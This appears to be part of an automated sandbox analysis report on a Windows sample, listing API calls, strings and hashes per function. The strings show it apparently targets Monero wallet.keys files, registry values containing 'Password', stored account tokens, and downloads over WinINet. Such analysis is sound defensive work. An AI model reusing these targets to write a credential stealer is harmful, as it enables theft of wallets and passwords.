                          Download Yara Rule
                          APIs
                            • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004012B4
                            • Part of subcall function 004012A0: RtlAllocateHeap.NTDLL(00000000), ref: 004012BB
                            • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                            • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004012F5
                            • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0040134F
                          • lstrlen.KERNEL32(?), ref: 0040135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00401377
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 771b9f8fbee469c706167788f983bf5398b85f3009b7fdedb01d081a7709bf8e
                          • Instruction ID: 2043a3887805ea6c56e3178cdbea9a9898fb9ec432e120889b6b1f894c0cfb52
                          • Opcode Fuzzy Hash: 771b9f8fbee469c706167788f983bf5398b85f3009b7fdedb01d081a7709bf8e
                          • Instruction Fuzzy Hash: 115163B1D5011897CB15FB61DD92FED737CAF50304F4041ADB20A62091EE385BDACBAA
                          Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0040733A
                            • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                            • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                            • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00407452
                            • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000), ref: 00407459
                          • lstrcat.KERNEL32(00000000,004217FC), ref: 00407606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00407648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0040765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040768F
                          • lstrcat.KERNEL32(00000000,00421804), ref: 004076A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004076D3
                          • lstrcat.KERNEL32(00000000,00421808), ref: 004076ED
                          • task.LIBCPMTD ref: 004076FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                          • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                          • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                          • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                          Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0128D838,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                          • __aulldiv.LIBCMT ref: 00418172
                          • __aulldiv.LIBCMT ref: 00418180
                          • wsprintfA.USER32 ref: 004181AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                          • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                          • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                          Function 004060A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 004061DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                          • InternetCloseHandle.WININET(?), ref: 00406253
                          • InternetCloseHandle.WININET(00000000), ref: 00406260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: ab3784fe0b46da7b28e8c10d9ea5d0b529e82314f904c2f6f7e079643bbd3618
                          • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                          • Opcode Fuzzy Hash: ab3784fe0b46da7b28e8c10d9ea5d0b529e82314f904c2f6f7e079643bbd3618
                          • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                          Function 004072D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0040733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00407452
                          • HeapFree.KERNEL32(00000000), ref: 00407459
                          • task.LIBCPMTD ref: 00407555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                          • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                          • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                          • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                          Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0040BC9F
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0040BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0040BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                          • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                          • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                          • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                          Function 00416770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                          • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                          • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                          • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                          Function 00404FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404FD1
                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00405041
                          • InternetCloseHandle.WININET(?), ref: 004050B9
                          • InternetCloseHandle.WININET(?), ref: 004050C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 4fd2a467fd6bf3e29bd82fd8903457f740f93c8251a9d339e881c6e44e43cf95
                          • Instruction ID: b99e9efde984867735bda927bde45e9de8b03a596fe48837239c4182617af08d
                          • Opcode Fuzzy Hash: 4fd2a467fd6bf3e29bd82fd8903457f740f93c8251a9d339e881c6e44e43cf95
                          • Instruction Fuzzy Hash: AD3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9E609B7281C7746AC58F99
                          Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                          • wsprintfA.USER32 ref: 00418459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0128DAA8,00000000,000F003F,?,00000400), ref: 004184EC
                          • lstrlen.KERNEL32(?), ref: 00418501
                          • RegQueryValueExA.ADVAPI32(00000000,0128D8B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
